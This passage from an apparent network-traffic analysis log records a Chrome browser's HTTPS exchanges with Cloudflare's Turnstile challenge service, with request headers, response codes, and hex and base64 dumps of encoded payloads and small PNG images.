                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 6d 47 46 6b 6e 6c 64 58 35 32 6c 71 35 6c 72 70 36 61 73 6e 57 39 7a 70 5a 4f 43 68 48 69 50 6d 35 71 6c 73 4c 69 76 6e 48 2b 41 6d 35 71 42 6f 5a 5a 36 73 61 61 62 76 49 65 76 6a 70 6a 41 71 37 4c 48 7a 4b 7a 41 31 4a 4b 7a 6c 63 6d 30 33 35 33 58 31 64 48 4c 6c 74 48 50 31 4c 48 71 77 4e 58 4a 33 65 6a 4b 37 4c 47 77 71 73 2f 79 30 62 4c 69 37 63 6a 55 30 37 33 36 2b 66 50 4b 34 73 36 36 31 4d 44 52 42 74 54 35 43 2f 33 56 2b 77 62 49 33 75 49 52 37 2b 6b 4c 42 41 37 6a 39 4e 73 61 35 64 41 68 36 78 44 71 37 4f 77 55 2b 76 50 61 41 53 59 70 42 51 4c 39 41 52 41 53 38 65 2f 76 37 67 77 79 42 44 55 34 4a 51 67 30 39 77 34 62 45 43 4c 37 41 53 4d 48 50 7a 48 37 4e 79 49 47 50 55 6b 72 54 7a 30 39 4e 53 45 78 49 77 6f 58 57 69 52 52 55 30 5a 63 50 57 49 55
                                                                                                                                                Data Ascii: mGFknldX52lq5lrp6asnW9zpZOChHiPm5qlsLivnH+Am5qBoZZ6saabvIevjpjAq7LHzKzA1JKzlcm0353X1dHLltHP1LHqwNXJ3ejK7LGwqs/y0bLi7cjU0736+fPK4s661MDRBtT5C/3V+wbI3uIR7+kLBA7j9Nsa5dAh6xDq7OwU+vPaASYpBQL9ARAS8e/v7gwyBDU4JQg09w4bECL7ASMHPzH7NyIGPUkrTz09NSExIwoXWiRRU0ZcPWIU
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 5a 31 71 58 53 62 68 6e 32 4f 66 36 32 54 5a 71 53 47 71 59 52 76 6a 72 47 50 68 35 61 37 6a 59 71 58 75 4a 57 65 6e 73 4b 59 75 4a 37 42 6e 37 32 47 78 4c 69 61 79 4b 32 6c 6e 39 44 4b 77 62 47 5a 31 36 6a 4d 73 72 4f 78 71 72 4b 39 74 4b 2f 47 32 63 6e 6f 34 64 69 72 33 63 47 6e 77 65 54 54 31 4e 54 53 76 2b 62 48 78 2b 6a 6c 35 4c 58 48 31 74 75 34 77 74 72 73 31 4e 33 77 77 75 58 59 33 66 7a 37 42 38 63 51 7a 77 62 39 34 4e 2f 77 79 66 4d 4b 34 78 4c 78 31 74 37 2b 48 4f 6f 69 36 79 58 79 41 65 50 37 38 67 63 55 35 2b 59 51 41 53 77 6e 48 79 7a 7a 46 77 59 4b 4b 41 59 57 4b 77 58 76 4e 44 51 4a 46 54 34 7a 4c 66 78 48 4d 52 6f 59 41 78 6f 68 53 30 31 4b 43 55 59 74 53 45 67 73 45 41 34 54 56 56 52 49 55 56 39 4d 4b 32 41 76 48 45 4a 59 52 44 35 59 59
                                                                                                                                                Data Ascii: Z1qXSbhn2Of62TZqSGqYRvjrGPh5a7jYqXuJWensKYuJ7Bn72GxLiayK2ln9DKwbGZ16jMsrOxqrK9tK/G2cno4dir3cGnweTT1NTSv+bHx+jl5LXH1tu4wtrs1N3wwuXY3fz7B8cQzwb94N/wyfMK4xLx1t7+HOoi6yXyAeP78gcU5+YQASwnHyzzFwYKKAYWKwXvNDQJFT4zLfxHMRoYAxohS01KCUYtSEgsEA4TVVRIUV9MK2AvHEJYRD5YY
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 52 71 61 39 77 66 36 43 4d 70 6f 2b 36 6b 4b 36 4a 76 61 79 6f 6f 4d 4a 2b 75 61 57 34 6f 35 69 55 74 6f 48 4d 70 62 72 45 6e 49 4b 70 7a 59 75 64 73 72 4b 30 6b 5a 54 56 6a 62 7a 49 72 4c 37 68 6f 4b 71 7a 77 71 50 43 30 73 44 55 31 62 57 70 34 4f 48 64 7a 4d 58 42 34 36 72 41 34 37 44 4a 79 50 6e 75 76 50 37 62 74 39 6a 35 7a 39 55 43 42 74 48 76 78 64 37 37 79 75 76 31 78 65 6e 43 36 63 6b 4e 78 74 54 79 47 51 30 43 43 50 55 61 38 2b 30 54 32 77 72 72 37 2f 67 58 39 52 37 33 4b 76 55 47 35 65 77 77 36 43 44 35 43 75 6f 51 45 69 34 76 49 51 59 57 50 54 50 37 45 68 51 38 2f 53 39 41 4f 66 63 69 4f 77 63 67 4f 30 45 48 44 6c 42 44 4a 53 45 67 44 53 68 43 4e 6b 6b 56 4d 43 68 4e 48 45 78 67 47 6a 34 62 55 56 63 6c 54 6d 4a 43 4e 44 59 39 4b 31 34 72 56 31
                                                                                                                                                Data Ascii: Rqa9wf6CMpo+6kK6JvayooMJ+uaW4o5iUtoHMpbrEnIKpzYudsrK0kZTVjbzIrL7hoKqzwqPC0sDU1bWp4OHdzMXB46rA47DJyPnuvP7bt9j5z9UCBtHvxd77yuv1xenC6ckNxtTyGQ0CCPUa8+0T2wrr7/gX9R73KvUG5eww6CD5CuoQEi4vIQYWPTP7EhQ8/S9AOfciOwcgO0EHDlBDJSEgDShCNkkVMChNHExgGj4bUVclTmJCNDY9K14rV1
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 64 47 35 76 69 33 56 37 6d 72 6d 4b 6b 37 2b 34 73 59 54 44 68 4d 57 64 67 5a 61 71 6e 71 71 35 70 71 37 45 6e 38 47 77 6a 63 6e 42 74 4a 43 37 76 4c 75 36 76 61 36 65 33 38 47 36 30 4a 36 39 6e 72 7a 64 77 75 61 6a 37 65 37 4e 35 71 66 64 38 50 54 6e 37 4b 6e 41 2b 62 53 30 73 72 4f 31 75 4e 2f 4f 76 65 48 4e 2f 4d 50 7a 76 2f 72 62 39 39 66 70 2b 66 72 59 43 77 54 2b 79 2f 30 55 34 76 50 6b 42 65 76 6c 35 51 77 66 36 50 6b 55 32 65 4d 55 41 2f 62 7a 47 41 63 49 39 53 77 70 2b 69 55 51 49 68 4d 6c 42 66 34 42 4d 69 77 59 48 52 67 4a 48 41 77 35 45 50 6b 37 49 50 34 54 4b 42 67 54 49 6b 6f 4e 4c 45 6b 47 43 41 51 70 4d 45 6b 6e 4c 56 4e 4f 4f 7a 56 46 56 6c 56 54 4f 31 4e 5a 56 7a 52 58 49 52 6c 48 4d 6b 63 38 58 56 59 75 4a 6a 42 44 51 46 30 6d 56 45 68
                                                                                                                                                Data Ascii: dG5vi3V7mrmKk7+4sYTDhMWdgZaqnqq5pq7En8GwjcnBtJC7vLu6va6e38G60J69nrzdwuaj7e7N5qfd8PTn7KnA+bS0srO1uN/OveHN/MPzv/rb99fp+frYCwT+y/0U4vPkBevl5Qwf6PkU2eMUA/bzGAcI9Swp+iUQIhMlBf4BMiwYHRgJHAw5EPk7IP4TKBgTIkoNLEkGCAQpMEknLVNOOzVFVlVTO1NZVzRXIRlHMkc8XVYuJjBDQF0mVEh
                                                                                                                                                2024-10-28 16:49:20 UTC1369INData Raw: 35 53 31 74 35 46 30 74 37 79 43 6b 4b 56 2b 76 6f 65 63 71 6f 4f 67 75 39 47 78 76 72 37 53 30 73 66 43 7a 4d 2f 55 6b 39 71 55 31 4a 6d 72 7a 36 43 5a 70 4e 50 51 74 4a 36 66 77 73 43 72 35 4f 48 71 7a 38 47 77 38 4e 58 6f 79 75 54 4b 30 2b 54 62 78 2b 33 34 33 38 37 4c 37 4f 2f 51 76 2b 4c 33 30 38 6a 63 35 38 6e 2b 32 50 6f 49 36 4d 2f 78 46 67 2f 78 34 65 6b 4d 2b 76 7a 58 38 68 67 61 45 51 2f 2b 37 50 6f 45 46 68 30 46 34 51 7a 37 39 65 62 37 44 78 76 2b 36 2b 6b 42 43 68 45 54 38 41 67 34 4e 50 51 70 2f 76 55 4f 50 45 41 55 2f 41 62 2b 45 6a 6f 5a 43 41 55 66 50 6b 73 6a 53 30 46 44 45 55 51 6b 45 54 56 52 54 43 73 54 4a 7a 55 38 54 7a 67 66 58 43 4d 2b 54 6c 52 6c 51 30 5a 48 49 6c 38 33 51 6a 68 73 4d 46 78 49 63 57 31 7a 51 32 49 35 61 47 51 32
                                                                                                                                                Data Ascii: 5S1t5F0t7yCkKV+voecqoOgu9Gxvr7S0sfCzM/Uk9qU1Jmrz6CZpNPQtJ6fwsCr5OHqz8Gw8NXoyuTK0+Tbx+34387L7O/Qv+L308jc58n+2PoI6M/xFg/x4ekM+vzX8hgaEQ/+7PoEFh0F4Qz79eb7Dxv+6+kBChET8Ag4NPQp/vUOPEAU/Ab+EjoZCAUfPksjS0FDEUQkETVRTCsTJzU8TzgfXCM+TlRlQ0ZHIl83QjhsMFxIcW1zQ2I5aGQ2


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                67192.168.2.1649802104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:21 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1575504935:1730132393:tsQBD6pnm-dRZ8ZlJHXvfJ9o3TZjLECqHOVZguSlcVA/8d9c6b17ae923aaf/phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:21 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:21 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                cf-chl-out: dnCdSnfPznubLt/Vs7229qBnr3LRWITNiYo=$EyV4QQiHwuTkxufy
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b2e9f600c40-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:21 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                68192.168.2.1649803104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:21 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8d9c6b17ae923aaf/1730134160233/8a71020ba386488777a483e1ae773c3ccfea843ec9224ce39a3849d2a4a2d100/hrjXq_u_Ts2Gd6l HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:22 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:21 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 1
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-28 16:49:22 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 69 6e 45 43 43 36 4f 47 53 49 64 33 70 49 50 68 72 6e 63 38 50 4d 5f 71 68 44 37 4a 49 6b 7a 6a 6d 6a 68 4a 30 71 53 69 30 51 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20ginECC6OGSId3pIPhrnc8PM_qhD7JIkzjmjhJ0qSi0QAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                2024-10-28 16:49:22 UTC1INData Raw: 4a
                                                                                                                                                Data Ascii: J


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                69192.168.2.1649804104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:23 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9c6b17ae923aaf/1730134160237/-JiMk9ZyEBn9URm HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:23 UTC200INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:23 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b373d702cde-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:23 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 22 00 00 00 31 08 02 00 00 00 30 67 ec a0 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDR"10gIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                70192.168.2.1649805104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:23 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9c6b17ae923aaf/1730134160237/-JiMk9ZyEBn9URm HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:24 UTC200INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:23 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b3bfad3e7a2-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 22 00 00 00 31 08 02 00 00 00 30 67 ec a0 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDR"10gIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                71192.168.2.1649806104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:24 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1575504935:1730132393:tsQBD6pnm-dRZ8ZlJHXvfJ9o3TZjLECqHOVZguSlcVA/8d9c6b17ae923aaf/phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 31652
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:24 UTC16384OUTData Raw: 76 5f 38 64 39 63 36 62 31 37 61 65 39 32 33 61 61 66 3d 54 57 79 37 66 24 43 52 34 45 79 43 57 59 70 6c 76 43 66 6b 74 6e 45 43 69 6b 6c 37 51 37 59 45 6b 67 59 6b 6c 4c 79 6c 78 6b 4f 6b 30 4c 24 73 78 43 77 6b 43 4c 43 45 52 6b 74 74 6b 4b 50 6b 43 34 4c 6b 53 4e 6b 64 6b 76 4e 25 32 62 62 44 6b 7a 4e 24 4d 37 65 31 6b 57 6b 66 6b 74 2b 4e 6b 32 2b 37 70 79 6b 38 37 6c 44 6b 67 37 6e 45 44 56 44 41 66 6b 24 6b 6f 37 45 45 6b 52 37 45 62 54 56 51 4c 74 34 6b 68 2b 49 2b 71 57 34 34 6b 6b 6a 4c 6b 54 34 37 77 66 79 70 4f 37 6b 63 41 6b 61 31 6e 43 4c 64 6b 45 57 6b 72 61 79 6b 2b 4a 59 6a 35 70 56 6b 45 66 48 31 4f 50 64 75 24 34 79 34 31 49 32 63 77 61 4c 48 4f 6b 24 59 4f 66 48 56 54 41 71 72 37 66 74 6e 6b 61 4b 33 33 4c 24 39 54 42 70 64 58 52 2d 4a
                                                                                                                                                Data Ascii: v_8d9c6b17ae923aaf=TWy7f$CR4EyCWYplvCfktnECikl7Q7YEkgYklLylxkOk0L$sxCwkCLCERkttkKPkC4LkSNkdkvN%2bbDkzN$M7e1kWkfkt+Nk2+7pyk87lDkg7nEDVDAfk$ko7EEkR7EbTVQLt4kh+I+qW44kkjLkT47wfypO7kcAka1nCLdkEWkrayk+JYj5pVkEfH1OPdu$4y41I2cwaLHOk$YOfHVTAqr7ftnkaK33L$9TBpdXR-J
                                                                                                                                                2024-10-28 16:49:24 UTC15268OUTData Raw: 2b 70 66 52 69 35 77 31 58 55 6f 50 67 4e 48 6e 6e 65 6c 4d 6b 43 35 71 37 66 70 72 6f 58 59 6b 4a 4e 49 4c 2b 34 24 34 37 6b 6b 74 57 24 6b 58 4c 6b 49 6b 52 6b 54 4e 58 76 43 43 4c 34 6b 6b 57 43 61 37 5a 6b 44 52 43 76 6b 4a 45 6c 35 50 61 79 44 37 59 6b 45 4c 43 6c 34 41 57 6b 4c 44 31 6b 48 37 24 4d 6b 2d 6b 59 37 6c 61 6b 6a 6b 48 6f 48 70 6b 48 6b 6c 4c 6b 46 6b 5a 6b 58 4f 43 72 6b 62 42 44 52 43 70 6b 55 6b 2b 73 43 31 6b 45 37 54 79 43 54 72 64 37 59 34 6c 4f 6b 79 6b 54 34 6c 72 6b 6a 37 48 49 6c 32 37 30 6b 54 49 6c 2d 6b 7a 37 6e 6b 24 63 6b 79 6b 6e 79 43 79 6b 48 37 45 37 6b 65 6b 73 56 24 6b 6b 41 37 4f 45 59 6b 6c 61 6b 58 64 41 37 6c 2b 79 76 37 58 39 43 37 6b 30 37 59 6b 6b 57 4c 39 70 48 4b 43 72 6b 65 37 41 34 6c 32 37 39 6b 59 34 45
                                                                                                                                                Data Ascii: +pfRi5w1XUoPgNHnnelMkC5q7fproXYkJNIL+4$47kktW$kXLkIkRkTNXvCCL4kkWCa7ZkDRCvkJEl5PayD7YkELCl4AWkLD1kH7$Mk-kY7lakjkHoHpkHklLkFkZkXOCrkbBDRCpkUk+sC1kE7TyCTrd7Y4lOkykT4lrkj7HIl270kTIl-kz7nk$ckyknyCykH7E7keksV$kkA7OEYklakXdA7l+yv7X9C7k07YkkWL9pHKCrke7A4l279kY4E
                                                                                                                                                2024-10-28 16:49:24 UTC330INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:24 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 26280
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: EeYTQBNrIN8TDgn0UN/Vb/iYC5yH0NTyUZSUPUA7/ZZHrxQ1FIW5FK2YSXNA7BJ/vU9M0UuAzppRWC1F$ncRVkzBtcvAinBpZ
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b3dda243acd-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:24 UTC1039INData Raw: 72 61 32 51 65 6f 61 38 6d 4a 4f 4d 77 61 43 5a 68 70 53 33 76 61 69 56 79 58 2b 65 76 36 2b 44 6f 73 4f 2b 7a 6f 7a 48 6b 37 43 6d 33 4e 53 32 31 39 72 4a 72 5a 33 50 75 39 47 65 70 37 4b 39 79 72 6a 71 35 62 33 76 35 75 57 2b 76 65 4c 6a 79 4d 2b 33 71 2b 57 32 7a 72 66 34 31 50 6e 63 76 2f 6e 30 38 2f 4c 39 30 73 59 48 39 50 54 4c 44 65 48 69 35 76 30 4f 45 76 44 51 45 76 4c 50 42 76 7a 30 33 50 66 32 31 2f 6a 71 49 74 2f 39 41 51 59 4a 35 77 55 70 35 2f 58 75 48 67 30 6c 35 44 48 79 37 75 77 41 47 51 63 6a 44 66 6b 30 39 52 55 75 45 30 49 44 48 44 6f 2b 52 54 4d 49 4f 52 76 2b 4f 52 63 59 4a 79 5a 52 50 79 59 6c 49 45 6f 59 52 43 6b 32 4a 54 64 41 50 6c 78 57 51 78 31 55 58 55 68 5a 4a 56 70 4c 53 56 70 72 54 7a 6f 72 4d 6d 6b 71 62 47 39 4b 54 33 6c
                                                                                                                                                Data Ascii: ra2Qeoa8mJOMwaCZhpS3vaiVyX+ev6+DosO+zozHk7Cm3NS219rJrZ3Pu9Gep7K9yrjq5b3v5uW+veLjyM+3q+W2zrf41Pncv/n08/L90sYH9PTLDeHi5v0OEvDQEvLPBvz03Pf21/jqIt/9AQYJ5wUp5/XuHg0l5DHy7uwAGQcjDfk09RUuE0IDHDo+RTMIORv+ORcYJyZRPyYlIEoYRCk2JTdAPlxWQx1UXUhZJVpLSVprTzorMmkqbG9KT3l
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 79 71 61 53 72 78 35 32 59 78 63 43 6a 71 39 4b 52 31 70 61 77 71 38 65 56 75 61 72 4b 6d 4c 71 33 72 4b 72 56 78 63 61 32 70 4e 36 68 35 2b 61 71 36 37 6a 65 36 4c 37 72 71 38 47 72 76 73 2f 57 75 4c 71 30 37 37 61 39 76 76 50 38 38 63 37 4f 32 4d 50 52 36 4e 63 46 39 77 76 68 37 2f 63 48 32 2b 33 4c 43 67 67 47 7a 52 62 68 48 42 66 77 39 39 63 65 32 51 4d 52 45 52 76 37 38 52 55 5a 2f 50 50 6d 43 69 34 70 4c 53 6f 6a 4e 43 51 64 37 2f 59 69 38 68 67 77 42 6a 30 75 44 78 6f 58 49 52 30 69 52 68 34 34 42 77 4e 47 4e 77 6f 71 4b 78 73 48 54 6b 78 55 4c 53 59 56 54 55 68 51 46 6a 63 35 47 6b 73 73 4f 55 46 5a 48 7a 41 62 4c 69 56 59 5a 6a 64 6d 4f 31 34 6d 63 47 45 37 62 57 4d 77 58 55 70 54 51 6c 4a 76 57 6c 46 4f 56 57 6f 35 61 6e 4b 45 5a 48 4a 53 51 31
                                                                                                                                                Data Ascii: yqaSrx52YxcCjq9KR1pawq8eVuarKmLq3rKrVxca2pN6h5+aq67je6L7rq8Grvs/WuLq077a9vvP88c7O2MPR6NcF9wvh7/cH2+3LCggGzRbhHBfw99ce2QMRERv78RUZ/PPmCi4pLSojNCQd7/Yi8hgwBj0uDxoXIR0iRh44BwNGNwoqKxsHTkxULSYVTUhQFjc5GkssOUFZHzAbLiVYZjdmO14mcGE7bWMwXUpTQlJvWlFOVWo5anKEZHJSQ1
                                                                                                                                                2024-10-28 16:49:24 UTC1369INData Raw: 77 35 69 38 6a 4e 43 6a 78 71 58 4b 6c 4d 6a 50 7a 73 6d 77 7a 63 33 53 7a 36 44 58 6e 4c 6a 44 32 65 53 33 71 4e 53 32 70 39 37 50 7a 4d 62 43 70 65 61 75 74 74 4c 52 73 62 72 73 37 66 66 35 38 73 2f 65 30 50 7a 55 7a 67 51 46 43 75 6a 54 31 39 55 43 37 2b 6f 44 30 4f 2f 52 30 65 63 42 34 42 6f 4c 45 51 33 38 42 78 66 79 33 65 37 30 32 66 41 52 34 50 48 2b 46 69 67 47 41 75 59 41 48 41 73 4f 45 52 51 57 43 43 63 79 45 69 30 7a 45 6a 30 76 48 6a 45 55 50 68 4d 4f 47 44 59 58 41 52 56 44 4b 77 63 64 4b 43 68 50 50 53 39 42 44 68 49 78 49 79 45 74 4e 54 59 39 4d 7a 67 59 57 7a 56 69 57 42 70 44 57 43 4e 6f 53 47 4e 41 53 30 55 71 57 30 39 5a 4c 6c 42 31 51 6d 68 4d 51 69 39 4c 4f 30 6c 4c 58 6e 5a 30 64 6b 78 4f 55 58 56 35 52 6b 4f 42 67 31 31 44 64 32 4a
